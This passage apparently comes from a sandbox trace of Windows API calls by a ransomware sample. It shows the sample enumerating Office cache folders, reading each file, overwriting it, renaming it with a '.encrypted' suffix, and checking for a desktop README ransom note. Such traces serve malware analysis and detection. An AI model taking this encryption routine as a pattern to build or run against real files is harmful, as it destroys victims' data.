nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0232.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0232.332] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.334] GetFileType (hFile=0x280) returned 0x1 [0232.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0232.334] GetFileType (hFile=0x280) returned 0x1 [0232.334] WriteFile (in: hFile=0x280, lpBuffer=0x22a90c4*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x22a90c4*, lpNumberOfBytesWritten=0x2ee7c4*=0x2490, lpOverlapped=0x0) returned 1 [0232.335] CloseHandle (hObject=0x280) returned 1 [0232.336] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0232.336] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0232.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0232.336] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x7005cec0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x2490)) returned 1 [0232.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0232.336] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0232.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0232.337] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0232.338] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpFilePart=0x0) returned 0x44 [0232.338] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f1230 [0232.339] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.339] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0232.340] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0232.340] FindClose (in: hFindFile=0x94f1230 | out: hFindFile=0x94f1230) returned 1 [0232.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0232.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0232.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0232.340] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0232.340] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpFilePart=0x0) returned 0x44 [0232.340] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f1230 [0232.341] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.341] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0232.341] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 0 [0232.341] FindClose (in: hFindFile=0x94f1230 | out: hFindFile=0x94f1230) returned 1 [0232.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0232.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0232.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0232.342] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0232.342] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0232.342] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f1230 [0232.345] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.345] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0232.345] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0232.346] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0232.346] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0232.346] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0232.346] FindClose (in: hFindFile=0x94f1230 | out: hFindFile=0x94f1230) returned 1 [0232.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0232.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0232.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0232.347] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0232.347] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0232.347] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f1230 [0232.349] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.349] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0232.349] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0232.349] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0232.350] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0232.350] FindNextFileW (in: hFindFile=0x94f1230, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0232.350] FindClose (in: hFindFile=0x94f1230 | out: hFindFile=0x94f1230) returned 1 [0232.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0232.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0232.351] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0232.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0232.351] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.353] GetFileType (hFile=0x280) returned 0x1 [0232.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0232.353] GetFileType (hFile=0x280) returned 0x1 [0232.353] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x333 [0232.353] ReadFile (in: hFile=0x280, lpBuffer=0x22afb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22afb28*, lpNumberOfBytesRead=0x2ee7d4*=0x333, lpOverlapped=0x0) returned 1 [0232.355] CloseHandle (hObject=0x280) returned 1 [0232.378] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0232.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0232.378] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0232.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0232.379] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0232.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0232.379] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.380] GetFileType (hFile=0x280) returned 0x1 [0232.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0232.380] GetFileType (hFile=0x280) returned 0x1 [0232.380] WriteFile (in: hFile=0x280, lpBuffer=0x22feb98*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22feb98*, lpNumberOfBytesWritten=0x2ee798*=0x340, lpOverlapped=0x0) returned 1 [0232.382] CloseHandle (hObject=0x280) returned 1 [0232.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0232.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.encrypted", lpFilePart=0x0) returned 0x59 [0232.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0232.382] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x700cf2e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x340)) returned 1 [0232.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0232.382] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.encrypted")) returned 1 [0232.387] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0232.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0232.387] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.387] GetFileType (hFile=0x280) returned 0x1 [0232.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0232.387] GetFileType (hFile=0x280) returned 0x1 [0232.387] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0xa40 [0232.387] ReadFile (in: hFile=0x280, lpBuffer=0x2300950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: 